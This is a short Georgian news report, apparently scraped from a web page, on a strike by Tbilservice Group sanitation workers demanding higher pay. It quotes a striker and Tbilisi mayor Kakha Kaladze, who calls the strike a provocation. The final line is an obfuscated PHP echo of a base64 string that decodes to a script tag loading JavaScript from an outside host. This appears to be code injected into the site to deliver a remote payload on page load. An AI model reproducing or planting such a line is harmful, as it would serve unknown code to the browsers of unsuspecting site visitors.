celsiusi
ავერსი შნაიდერი
„თბილსერვის ჯგუფის“ თანამშრომლების ნაწილის გაფიცვა გრძელდება. დასუფთავების სამსახურის თანამშრომლები დღეს დილიდან "თბილსევის ჯგუფის" შენობასთან აქციას მართავენ. მათი მთავარი მოთხოვნა სამუშაო პირობების გაუმჯობესება და ხელფასის 50%-ით გაზრდაა.
 
„ჩვენი მოთხოვნა არის ხელფასის გაზრდა, ტექნიკის და გრაფიკის გაუმჯობესება. ხელზე ასაღები გვაქვს 1250 ლარი და760 ლარს ვიღებ. დანარჩენი თანხა სად მიდის? რატომ არ მოდის თბილისის მერი კახა კალაძე? ხომ უნდა მოვიდეს დაგველაპარაკოს, გაითვალისწინოს ჩვენი შრომა. რატომ არ გვაფასებენ?! მოგვცენ ის ხელფასი, რაც გვაქვს ან გაგვიზარდონ" , - განაცხადა აქციის ერთ-ერთმა მონაწილემ.
 
ამასთან, განცხადება გააკეთა დედაქალაქის მერმა კახა კალაძემ.
 
„ეს იყო დაგეგმილი პროვოკაცია, თუმცა ყველა პროვოკაციას მოყვება შესაბამისი რეაგირება“, – განაცხადა კახა კალაძემ „თბილსერვის ჯგუფის“ თანამშრომლების ნაწილის გაფიცვასთან დაკავშირებით.
 
თბილისის მერმა საყოფაცხოვრებო ნარჩენების გატანაში წუხელ პირადად მიიღო მონაწილეობა.
 
1091
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");